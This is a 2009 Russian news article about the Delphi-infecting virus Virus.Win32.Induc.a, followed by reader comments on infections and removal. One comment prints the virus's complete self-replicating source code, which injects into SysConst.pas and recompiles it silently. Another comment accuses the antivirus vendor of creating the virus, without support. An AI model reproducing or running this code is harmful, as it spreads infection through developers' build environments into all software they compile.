Virus.Win32.Induc.a – новый вирус для Delphi
18 августа 2009, Баранова Светлана
27
|
Лаборатория Касперского обнаружила вирус Virus.Win32.Induc.a, распространяющийся через интегрированную среду разработки программного обеспечения CodeGear Delphi. Защита от новейшей угрозы уже реализована во всех продуктах "Лаборатории Касперского".
Для своего размножения Virus.Win32.Induc.a использует механизм двушагового создания исполняемых файлов, реализованный в среде Delphi. Согласно данному механизму, исходный код разрабатываемых приложений сначала компилируется в промежуточные .dcu-модули, из которых затем собираются исполняемые в Windows файлы.
Новый вирус активизируется при запуске заражённого им приложения и проверяет, установлен ли на компьютере пакет среды разработки Delphi версий 4.0-7.0. В случае обнаружения пакета, Virus.Win32.Induc.a внедряется в исходный файл базовых констант Delphi Sysconst.pas и компилирует его, в результате чего получается модифицированный откомпилированный файл базовых констант Sysconst.dcu.
Практически каждый проект Delphi включает строчку "use SysConst", поэтому заражение одного системного модуля ведет к инфицированию всех разрабатываемых приложений. Это приводит к тому, что в результате модификации Sysconst.dcu, в дальнейшем все программы, создаваемые в заражённой среде, содержат код нового вируса. Изменённый pas-файл вирусу больше не нужен и удаляется.
В настоящее время вирус не несет функциональной нагрузки помимо самого заражения, скорее он предназначен для демонстрации и тестирования нового вектора заражений. Отсутствие заметной и деструктивной функциональности, инфицирование новым вирусом некоторых версий популярного интернет-пейджера QIP, а также обычная практика публикации .dcu-модулей разработчиками уже привели к широкому распространению Virus.Win32.Induc.a во всем мире. Вполне вероятно, что в будущем он может быть доработан киберпреступниками в сторону увеличения деструктивности.
Продукты "Лаборатории Касперского" успешно детектируют Virus.Win32.Induc.a и излечивают от него как откомпилированные в Delphi модули, так и файлы исполняемых в Windows форматов.
Рекомендуем также почитать
- Компания Лаборатория Касперского
- Новость Троян для Mac OS X представляется обновлением QuickTime
- Новость Рейтинг вредоносных программ за июль
- Новость Как проверить, украден ли аккаунт ВКонтакте и Одноклассники?
- Новость Тесты Symbian пропустили троянскую ботнет-программу
- Новость Trojan-Ransom.Win32.SMSer вымогает деньги от имени Касперского
Свежие новости раздела
Google готовит Android 11 и думает о запуске собственного процессора
Google хочет, чтобы новый дизайн платформы напоминал медиаадаптер Chromecast
ТОП-3 тарифов на интернет для загородных домов и коттеджей
ТОП-3 выгодных тарифов на интернет для загородных домов и коттеджей от провайдеров
Zyxel VPN2S – бюджетный межсетевой экран
Межсетевой экран Zyxel VPN2S поступит в продажу в июне этого года
Wrike: сервис для управления проектами
Российским компаниям стал доступен новый сервис для совместной работы над проектами.
NETGEAR M4300 Intelligent Edge: новые корпоративные коммутаторы
Представлена новая серия коммутаторов для корпоративных сетей с опциональной поддержкой POE.
Статьи раздела
-
Аппаратная IP-телефония от Gigaset
Интернет и сети
-
StarBlazer Tandem Ku: обзор двухстороннего спутникового интернета
Интернет и сети
-
Ganz ZN-M2AF: обзор миниатюрной IP-камеры для помещений
Интернет и сети
-
Ganz ZN-DT2MTP-IR: обзор IP-камеры 1080p стандарта IP66
Интернет и сети
-
UPVEL UP-228GE: обзор гигабитного коммутатора PoE+
Интернет и сети
-
Ganz ZN-MD221M: обзор антивандальной купольной IP-камеры 1080р
Интернет и сети
Все свежие новости
Apple обменивается исками с Ericsson, в 2022-м году сохранится дефицит микросхем
Apple обменивается исками с Ericsson, в 2022-м году сохранится дефицит микросхем
ZenFone Max Pro (M1) – новый смартфон от ASUS
ZenFone Max Pro – смартфон с высокой емкостью аккумулятора
ONYX BOOX Note – новый ридер с экраном 10,3"
Букридер с ридер с экраном 10,3" весит всего 325 граммов
Материнские платы ASUS на базе чипсетов AMD серии X470 уже в продаже
В материнские платы ASUS добавлены новые функции тонкой настройки, охлаждения и персонализации
MMO Project Genom – обновление Авалон
Обновление Project Genom – новая территория более 90 квадратных виртуальных километров
Искусственный интеллект научили думать по-собачьи
Ученые разработали систему на базе алгоритмов глубокого обучения, которая может действовать как собака.
Отзывы
27 Оставить отзывТоже Каспер обнаружил вышеописанную зверушку в autorun.exe одного из левых дисков. Диск приобретен, кстати, не где попало, а в супермаркете быттехники "Эльдорадо". Вынужден был запускать установку игры с этого диска минуя авторан.
то, что каспер лечить может зараженные файлы, это всего лишь значить, что аналитики не зря зад просиживают, а выполняют работу.
Эта скотина заразила мне E:/autorun.exe - СТАЛКЕР. Вылечить Касперским не получается, ссылаясь на то, что нет прав. Помогите плииииз
Мою D7 тоже подбили, я сначала думал, что она программы делает похожими на вирус, поэтому и не обратил никакого внимания, как думаете c QIP прибыл? или QIP самого заразили?
это точно, по статистике 90% зверей бродит по сети "благодаря" конторам по написанию антивирусов - по принципу сам породил и за бабло вылечил
Эта сука заразила мой дельфи
Заметь-те такой факт, что только Антивирус Касперского умеет грамотно удалять этот вирус из зараженных файлов! А остальные АВ просто бросают зараженные файлы в карантин без возможности востановления. Напрашивается очевидный факт, что именно лаборатория Касперского изобрела данный вирус, устроила его распространение с целью предложения лекарства от онного, что по их мнению (и так оно и есть) должно и уже способствует распространению именно их АВ продукта!!!
P.S.> КОзлы вонючие, знают что, их АВ не конкурентен по скорости и сильно тормозит машины - вот и толкнули способ наживится.
У меня сегодня этого гада семантик отыскал
У меня тоже это сцуко поселился
мне этот вирус уже достаточно мозгов насушил ..
блин у меня вирус win32.Induc.a//как мне избавиться от него ...((((((
У меня тоже каспер нашел на диске С System Volume Information
Virus.Win32.Induc.a
кошмар!
Внимание всем, использующим Delphi c 4 по 7!
Специфичный Delphi-вирус
В интернете появился специфичный для Delphi вирус. Суть его в том, что заражённая программа ищет на диске установленные версии Delphi и, если находит, изменяет файл SysConst.dcu (старая версия сохраняется под именем SysConst.bak), и после этого все программы на Delphi, скомпилированные на этом компьютере, начинают точно так же заражать Delphi на тех компьютерах, где они запускаются. Распространению вируса способствовало то, что некторые версии популярного мессенджера QIP оказались заражены им (команда разработчиков QIP приносит за это свои извинения). Пока единственный обнаруженный вредный эффект от вируса — это то, что из-за ошибки в его коде при запуске заражённой программы возникает Runtime error 3, если ключ реестра HKEY_LOCAL_MACHINE\SOFTWARE\Borland \Delphi\x.0 (x — от 4 до 7) содержит неправильное значение параметра RootDir (для правильного значение ошибки не происходит). Видимо, просто обкатывалась технология распространения вируса.
Проверьте свои версии Delphi и, если найдёте у себя SysConst.bak, выполните следующие действия:
1. Удалите SysConst.dcu
2. Скопируйте SysConst.bak в SysConst.dcu. Важно именно скопировать, а не переименовать, чтобы SysConst.bak тоже остался на диске — это убережёт систему от повторного заражения.
Код выглядит примерно вот так:
Код:
uses windows; var sc:array[1..24] of string=('uses windows; var sc:array[1..24] of string=(', 'function x(s:string):string;var i:integer;begin for i:=1 to length(s) do if s[i]', '=#36 then s[i]:=#39;result:=s;end;procedure re(s,d,e:string);var f1,f2:textfile;', 'h:cardinal;f:STARTUPINFO;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3:FILETIME;begin', 'h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);if hDWORD(-1) then begin CloseHandle', '(h);exit;end;{$I-}assignfile(f1,s);reset(f1);if ioresult0 then exit;assignfile', '(f2,d+$pas$);rewrite(f2);if ioresult0 then begin closefile(f1);exit;end; while', 'not eof(f1) do begin readln(f1,s); writeln(f2,s); if pos($implementation$,s)0', 'then break;end;for h:= 1 to 1 do writeln(f2,sc[h]);for h:= 1 to 23 do writeln(f2', ',$$$$+sc[h],$$$,$);writeln(f2,$$$$+sc[24]+$$$);$);for h:= 2 to 24 do writeln(f2,', 'x(sc[h]));closefile(f1);closefile(f2);{$I+}MoveFile(pchar(d+$dcu$),pchar(d+$bak$', ')); fillchar(f,sizeof(f),0); f.cb:=sizeof(f); f.dwFlags:=STARTF_USESHOWWINDOW;f.', 'wShowWindow:=SW_HIDE;b:=CreateProcess(nil,pchar(e+$"$+d+$pas"$),0,0,false,0,0,0,', 'f,p);if b then WaitForSingleObject(p.hProcess,INFINITE);MoveFile(pchar(d+$bak$),', 'pchar(d+$dcu$));DeleteFile(pchar(d+$pas$));h:=CreateFile(pchar(d+$bak$),0,0,0,3,', '0,0); if h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3); CloseHandle(h);h:=', 'CreateFile(pchar(d+$dcu$),256,0,0,3,0,0);if h=DWORD(-1) then exit;SetFileTime(h,', '@t1,@t2,@t3); CloseHandle(h); end; procedure st; var k:HKEY;c:array [1..255] of', 'char; i:cardinal; r:string; v:char; begin for v:=$4$ to $7$ do if RegOpenKeyEx(', 'HKEY_LOCAL_MACHINE,pchar($Software\Borland\Delphi\$+v+$.0$),0,KEY_READ,k)=0 then', 'begin i:=255;if RegQueryValueEx(k,$RootDir$,nil,@i,@c,@i)=0 then begin r:=$$;i:=', '1; while c[i]#0 do begin r:=r+c[i];inc(i);end;re(r+$\source\rtl\sys\SysConst$+', '$.pas$,r+$\lib\sysconst.$,$"$+r+$\bin\dcc32.exe" $);end;RegCloseKey(k);end; end;', 'begin st; end.'); function x(s:string):string; var i:integer; begin for i:=1 to length(s) do if s[i]=#36 then s[i]:=#39; result:=s; end; procedure re(s,d,e:string); var f1,f2:textfile; h:cardinal; f:STARTUPINFO; p:PROCESS_INFORMATION; b:boolean; t1,t2,t3:FILETIME; begin h:=CreateFile(pchar(d+'bak'),0,0,0,3,0,0); if hDWORD(-1) then begin CloseHandle(h); exit; end; {'I-}assignfile(f1,s); reset(f1); if ioresult0 then exit; assignfile(f2,d+'pas'); rewrite(f2); if ioresult0 then begin closefile(f1); exit; end; while not eof(f1) do begin readln(f1,s); writeln(f2,s); if pos('implementation',s)0 then break; end; for h:= 1 to 1 do writeln(f2,sc[h]); for h:= 1 to 23 do writeln(f2,''''+sc[h],''',');writeln(f2,''''+sc[24]+''');'); for h:= 2 to 24 do writeln(f2,x(sc[h])); closefile(f1); closefile(f2); {'I+}MoveFile(pchar(d+'dcu'),pchar(d+'bak')); fillchar(f,sizeof(f),0); f.cb := sizeof(f); f.dwFlags := STARTF_USESHOWWINDOW; f.wShowWindow := SW_HIDE; b := CreateProcess(nil,pchar(e+'"'+d+'pas"'),0,0,false,0,0,0,f,p); if b then WaitForSingleObject(p.hProcess,INFINITE); MoveFile(pchar(d+'bak'),pchar(d+'dcu')); DeleteFile(pchar(d+'pas')); h := CreateFile(pchar(d+'bak'),0,0,0,3,0,0); if h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3); CloseHandle(h); h := CreateFile(pchar(d+'dcu'),256,0,0,3,0,0); if h=DWORD(-1) then exit; SetFileTime(h,@t1,@t2,@t3); CloseHandle(h); end; procedure st; var k:HKEY;c:array [1..255] of char; i:cardinal; r:string; v:char; begin for v:='4' to '7' do if RegOpenKeyEx(HKEY_LOCAL_MACHINE,pchar('Software\Borland\Delphi\'+v+'.0'),0,KEY_READ,k)=0 then begin i:=255; if RegQueryValueEx(k,'RootDir',nil,@i,@c,@i)=0 then begin r:=''; i:=1; while c[i]#0 do begin r:=r+c[i]; inc(i); end; re(r+'\source\rtl\sys\SysConst'+'.pas',r+'\lib\sysconst.','"'+r+'\bin\dcc32.exe" '); end; RegCloseKey(k); end; end; begin st; end.
Похоже на "вирус", который размножается путём вписывания себя в установленные Delphi, так что все программы, выходящие из-под "заражённых" Delphi будут включать в себя этот "вирус". Правда ничего больше кроме размножения он не делает. Ну, кроме того, что из-за ошибки в коде вируса вы получаете RunTime error 3, если на вашей машине есть ключ реестра HKEY_LOCAL_MACHINE\SOFTWARE\Borland\Delphi\x.0 (x - от 4 до 7) с неправильным значением параметра RootDir (для правильного значение ошибки не происходит).
Определить факт "заражения" можно по наличию файла SysConst.bak в папке \Lib. Как удалить - просто удалить SysConst.dcu и переименовать SysConst.bak -> SysConst.dcu. Противодействовать - так-же: просто создайте SysConst.bak (из SysConst.dcu), так что "вирус" будет думать, что всю работу уже сделал. С уже скомпилированными программами так просто ничего не сделать - проще всего их будет пересобрать.
Сама проблема с RunTime Error 3 сидит тут:
Код:
{'I-}assignfile(f1,s); reset(f1); //
Браво!!!
Вот тут нашёл подробное FAQ по вирю:
http://gunsmoker.blogspot.com/2009/08/viruswin32induca.html
JAX, пасиба за ссылку.
А то сижу программирую для себя, никого не трогаю, а тут на тебе - Virus.Win32.Induc.a
Ничего себе!
Обнаружили тока сёдня, а проги у меня уже ХЗ сколько!
Просто надо поменять SysConst.dcu и SysConst.pas в Дельфях
Ссылка где их можно скачать: http://heroeswm.net/virus-kotoryj-zarazhaet-isxodniki-delphi.html
У меня все проги заразились!! Есть выход личения а не удаления??
Сегодня появилась модификация, которая Касперским не детектируется. Только NOD, DrWeb и Avast пока ее видят.
NOD32 v3 с сегодняшними базами нашел его в QIP.exe v8094 и убил насмерть (лечения даже не предлагалось)))
Последнее обновление баз Outpost Security от 19.08.2009 нашло его в квипе 8094, обновил до 8095 - пока тихо вот и обновляй после этого аську...
А ещё игра Сталкер? Оно тоже на Delphi.
а чё только про квип?) а АИМП?) и модули миранды и сотни других прог?)
Добавить отзыв